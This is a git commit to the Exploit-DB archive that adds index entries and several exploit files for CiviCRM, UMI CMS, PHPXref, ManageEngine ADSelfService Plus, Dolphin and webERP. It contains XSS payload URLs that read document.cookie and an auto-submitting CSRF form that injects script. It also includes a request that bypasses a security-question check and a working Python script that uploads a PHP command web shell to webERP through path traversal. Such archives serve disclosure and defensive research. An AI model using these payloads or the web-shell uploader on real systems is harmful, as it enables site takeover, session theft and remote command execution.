Updated 11_24_2014

This commit is contained in:
Offensive Security 2014-11-24 04:47:19 +00:00
parent 4283820381
commit 430fa48249
8 changed files with 196 additions and 1 deletions

View file

@ -18183,7 +18183,7 @@ id,file,description,date,author,platform,type,port
20912,platforms/windows/remote/20912.txt,"Trend Micro InterScan VirusWall for Windows NT 3.51 Configurations Modification Vulnerability",2001-06-12,"SNS Advisory",windows,remote,0
20913,platforms/php/webapps/20913.txt,"Disqus Blog Comments Blind SQL Injection Vulnerability",2012-08-29,Spy_w4r3,php,webapps,0
20914,platforms/cgi/remote/20914.pl,"cgiCentral WebStore 400 Administrator Authentication Bypass Vulnerability",2001-05-06,"Igor Dobrovitski",cgi,remote,0
20915,platforms/windows/local/20915.py,"ActFax 4.31 Local Privilege Escalation Exploit",2012-08-29,"Craig Freyman",windows,local,0
20915,platforms/windows/local/20915.py,"ActFax 4.31 - Local Privilege Escalation Exploit",2012-08-29,"Craig Freyman",windows,local,0
20916,platforms/cgi/remote/20916.pl,"cgiCentral WebStore 400 Arbitrary Command Execution Vulnerability",2001-05-06,"Igor Dobrovitski",cgi,remote,0
20917,platforms/windows/dos/20917.txt,"Winlog Lite SCADA HMI system SEH 0verwrite Vulnerability",2012-08-29,Ciph3r,windows,dos,0
20918,platforms/php/webapps/20918.txt,"Wordpress HD Webplayer 1.1 - SQL Injection Vulnerability",2012-08-29,JoinSe7en,php,webapps,0
@ -31817,3 +31817,10 @@ id,file,description,date,author,platform,type,port
35322,platforms/windows/local/35322.txt,"Privacyware Privatefirewall 7.0 - Unquoted Service Path Privilege Escalation",2014-11-22,LiquidWorm,windows,local,0
35323,platforms/php/webapps/35323.md,"MyBB <= 1.8.2 - unset_globals() Function Bypass and Remote Code Execution Vulnerability",2014-11-22,"Taoguang Chen",php,webapps,0
35325,platforms/hardware/webapps/35325.txt,"Netgear Wireless Router WNR500 - Parameter Traversal Arbitrary File Access Exploit",2014-11-22,LiquidWorm,hardware,webapps,0
35327,platforms/php/webapps/35327.txt,"CiviCRM 3.3.3 Multiple Cross Site Scripting Vulnerabilities",2011-02-08,"AutoSec Tools",php,webapps,0
35328,platforms/php/webapps/35328.txt,"UMI CMS 2.8.1.2 Multiple Cross Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0
35329,platforms/php/webapps/35329.txt,"PHPXref 0.7 'nav.html' Cross Site Scripting Vulnerability",2011-02-09,MustLive,php,webapps,0
35330,platforms/php/webapps/35330.txt,"ManageEngine ADSelfService Plus 4.4 POST Request Manipulation Security Question Weakness",2011-02-10,"Core Security",php,webapps,0
35331,platforms/php/webapps/35331.txt,"ManageEngine ADSelfService Plus 4.4 EmployeeSearch.cc Multiple Parameter XSS",2011-02-10,"Core Security",php,webapps,0
35332,platforms/php/webapps/35332.txt,"Dolphin 7.0.4 Multiple Cross Site Scripting Vulnerabilities",2011-02-10,"AutoSec Tools",php,webapps,0
35333,platforms/php/webapps/35333.py,"webERP 4.0.1 'InputSerialItemsFile.php' Arbitrary File Upload Vulnerability",2011-02-10,"AutoSec Tools",php,webapps,0

Can't render this file because it is too large.

28
platforms/php/webapps/35327.txt Executable file
View file

@ -0,0 +1,28 @@
source: http://www.securityfocus.com/bid/46275/info
CiviCRM is prone to multiple cross-site scripting vulnerabilities because they fail to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
CiviCRM 3.3.3. is vulnerable; prior versions may also be affected.
Drupal:
http://www.example.com/drupal-6.20/sites/all/modules/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?defaultPath=%3Cscript%3Ealert(0)%3C/script%3E
http://www.example.com/drupal-6.20/sites/all/modules/civicrm/packages/amfphp/browser/code.php?class=%3Cscript%3Ealert(0)%3C/script%3E
http://www.example.com/drupal-6.20/sites/all/modules/civicrm/packages/amfphp/browser/details.php?class=<script>alert(0)</script>
http://www.example.com/drupal-6.20/sites/all/modules/civicrm/packages/amfphp/browser/methodTable.php?class=%3Cscript%3Ealert(0)%3C/script%3E
Joomla:
http://www.example.com/joomla/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?defaultPath=%3Cscript%3Ealert(0)%3C/script%3E
http://www.example.com/joomla/administrator/components/com_civicrm/civicrm/packages/amfphp/browser/methodTable.php?class=%3Cscript%3Ealert(0)%3C/script%3E
http://www.example.com/joomla/administrator/components/com_civicrm/civicrm/packages/PHPgettext/examples/pigs_dropin.php?lang=0%3Cscript%3Ealert(0)%3C/script%3E
http://www.example.com/joomla/administrator/components/com_civicrm/civicrm/packages/PHPgettext/examples/pigs_fallback.php?lang=%3Cscript%3Ealert(0)%3C/script%3E

47
platforms/php/webapps/35328.txt Executable file
View file

@ -0,0 +1,47 @@
source: http://www.securityfocus.com/bid/46280/info
UMI CMS is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
UMI CMS 2.8.1.2 is vulnerable; other versions may also be affected.
<form action="http://host/admin/news/edit/PAGEID/do/" method="post" name="main" enctype="multipart/form-data" >
<input type="hidden" name="referer" value="hello">
<input type="hidden" name="domain" value="host">
<input type="hidden" name="name" value=&#039;news"><script>alert(document.cookie)</script>&#039;>
<input type="hidden" name="alt-name" value="altname">
<input type="hidden" name="active" value="0">
<input type="hidden" name="active" value="1">
<input type="hidden" name="type-id" value="23">
<input type="hidden" name="save-mode" value="Save">
<input type="hidden" name="template-id" value="2">
<input type="hidden" name="is-visible" value="0">
<input type="hidden" name="is-default" value="0">
<input type="hidden" name="perms_read[2373]" value="1">
</form>
<script>
document.main.submit();
</script>
<form action="http://[host]/admin/content/edit/PAGEID/do/" method="post" name="main" enctype="multipart/form-data" >
<input type="hidden" name="referer" value="google">
<input type="hidden" name="domain" value="[host]">
<input type="hidden" name="name" value=&#039;price3"><script>alert(document.cookie)</script>&#039;>
<input type="hidden" name="alt-name" value="price">
<input type="hidden" name="active" value="0">
<input type="hidden" name="active" value="1">
<input type="hidden" name="type-id" value="10">
<input type="hidden" name="save-mode" value="Save">
<input type="hidden" name="template-id" value="2">
<input type="hidden" name="is-visible" value="0">
<input type="hidden" name="is-visible" value="1">
<input type="hidden" name="is-default" value="0">
</form>
<script>
document.main.submit();
</script>

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/46302/info
PHPXref is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and steal cookie-based authentication credentials.
Versions prior to PHPXref 0.7 are vulnerable; other versions may also be affected.
http://www.example.com/nav.html?javascript:alert(document.cookie)

24
platforms/php/webapps/35330.txt Executable file
View file

@ -0,0 +1,24 @@
source: http://www.securityfocus.com/bid/46331/info
ManageEngine ADSelfService Plus is prone to multiple vulnerabilities, including multiple security-bypass and cross-site scripting vulnerabilities.
Attackers can exploit these issues to bypass certain security restrictions and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help them steal cookie-based authentication credentials and launch other attacks.
ManageEngine ADSelfService Plus 4.4 is vulnerable; other versions may also be affected.
POST /accounts/ValidateAnswers?methodToCall=validateAll HTTP/1.1
Host: SERVER
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.example.com/accounts/ValidateUser
Cookie: JSESSIONID=8F93EB242EF06C51BE93EB0CEDA69085
Content-Type: application/x-www-form-urlencoded
Content-Length: 294
loginId=1501&Hide_Captcha=0&POLICY_ID=1&Confirm_Answer=1&SESSION_EXPIRY_TIME=5&LOGIN_NAME=alice&REM_SESSION_TIME=00%3A40&bAns=11111&bQues=PreDefined-2&bAns=22222&bQues=PreDefined-3&bAns=33333&bQues=PreDefined-4&bAns=44444&bQues=PreDefined-5&quesList=4&DIGEST=qodpgd&next=Continue&DIS_ALL_QUES=1

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/46331/info
ManageEngine ADSelfService Plus is prone to multiple vulnerabilities, including multiple security-bypass and cross-site scripting vulnerabilities.
Attackers can exploit these issues to bypass certain security restrictions and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help them steal cookie-based authentication credentials and launch other attacks.
ManageEngine ADSelfService Plus 4.4 is vulnerable; other versions may also be affected.
http://www.example.com/EmployeeSearch.cc?actionId=showList&searchString=alice%22%20onmouseover=%22alert%28%27xss%27%29&parameterName=name&searchType=containshttp://www.example.com/EmployeeSearch.cc?actionId=Search&parameterName=name&searchType=contains&searchString=alice%22+onMouseOver%3D%22javascript%3Aalert%28%27xss%27%29

10
platforms/php/webapps/35332.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/46337/info
Dolphin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Dolphin 7.0.4 is vulnerable; other versions may also be affected.
http://www.example.com/dolphin/explanation.php?explain=%3Cscript%3Ealert(0)%3C/script%3E
http://www.example.com/dolphin/modules/boonex/custom_rss/post_mod_crss.php?relocate=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

61
platforms/php/webapps/35333.py Executable file
View file

@ -0,0 +1,61 @@
source: http://www.securityfocus.com/bid/46341/info
webERP is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
webERP 4.0.1 is vulnerable; other versions may also be affected.
import socket
host = 'localhost'
path = '/weberp'
shell_path = path + '/shell.php'
port = 80
def upload_shell():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
s.send('POST ' + path + '/includes/InputSerialItemsFile.php?LineNo=/../../../shell.php%00 HTTP/1.1\r\n'
'Host: localhost\r\n'
'Connection: keep-alive\r\n'
'User-Agent: x\r\n'
'Content-Length: 264\r\n'
'Cache-Control: max-age=0\r\n'
'Origin: null\r\n'
'Content-Type: multipart/form-data; boundary=----x\r\n'
'Accept: text/html\r\n'
'Accept-Encoding: gzip,deflate,sdch\r\n'
'Accept-Language: en-US,en;q=0.8\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
'\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="LineNo"\r\n'
'\r\n'
'shell.php\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="ImportFile"; filename="shell.php"\r\n'
'Content-Type: application/octet-stream\r\n'
'\r\n'
'<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
'------x--\r\n'
'\r\n')
resp = s.recv(8192)
http_ok = 'HTTP/1.1 200 OK'
if http_ok not in resp[:len(http_ok)]:
print 'error uploading shell'
return
else: print 'shell uploaded'
s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
'Host: ' + host + '\r\n\r\n')
if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found'
else: print 'shell located at http://' + host + shell_path
upload_shell()